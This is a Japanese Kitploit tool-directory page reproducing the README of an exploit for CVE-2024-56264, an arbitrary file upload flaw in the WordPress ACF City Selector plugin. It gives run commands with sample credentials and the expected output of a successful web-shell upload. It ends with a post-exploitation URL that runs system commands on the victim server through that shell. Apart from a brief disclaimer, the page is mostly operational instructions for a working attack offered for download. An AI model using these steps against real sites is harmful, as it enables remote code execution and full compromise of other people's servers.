Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-56264 — WordPress ACF City Selector プラグイン <= 1.14.0 - 任意のファイルアップロードの脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-56264
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-56264

CVE-2024-56264

WordPress ACF City Selector プラグイン <= 1.14.0 - 任意のファイルアップロードの脆弱性

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-56264

WordPress ACF City Selector - 任意ファイルアップロードエクスプロイト (CVE-2024-56264)

概要

このリポジトリには、WordPressプラグイン ACF City Selector(バージョン <= 1.14.0)で見つかった任意ファイルアップロード脆弱性であるCVE-2024-56264のエクスプロイトが含まれています。この脆弱性により、攻撃者は脆弱なWordPressインスタンスに**悪意のあるPHPファイル(ウェブシェル)**をアップロードし、サーバー上で任意のコマンドを実行できます。

CVE詳細

  • CVE ID: CVE-2024-56264
  • 公開日: 2025年1月2日
  • 影響を受けるプラグイン: ACF City Selector
  • 脆弱性のあるバージョン: <= 1.14.0
  • 影響: 制限なしファイルアップロードによるリモートコード実行 (RCE)

説明

ACF City Selectorプラグインはアップロードされたファイルを適切に検証せず、攻撃者が制限を回避して任意のPHPファイルをアップロードできるようにします。悪意のあるPHPファイルがアップロードされると、攻撃者はリモートからシステムコマンドを実行でき、サーバー全体の侵害につながります。

必要条件

📌 依存関係

以下のインストールが必要です:

  • Python 3.x
  • requests モジュール(インストール: pip install requests)

必要な依存関係はすべて以下のコマンドでインストールできます:

root@kitploit:~
pip install -r requirements.txt

🚀 使い方

エクスプロイトの実行:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

例:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

期待される出力

エクスプロイトが成功すると、次のように表示されます:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

エクスプロイト後

成功した場合、アップロードされたシェルに以下のURLでアクセスします:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

これにより、サーバー上でリモートコマンド実行が可能になります。

⚠ 免責事項

このスクリプトは教育目的および許可されたセキュリティテスト目的のみを意図しています。無許可での使用は違法であり、深刻な結果を招く可能性があります。著者はこのエクスプロイトの誤用について一切の責任を負いません。

ツールをダウンロード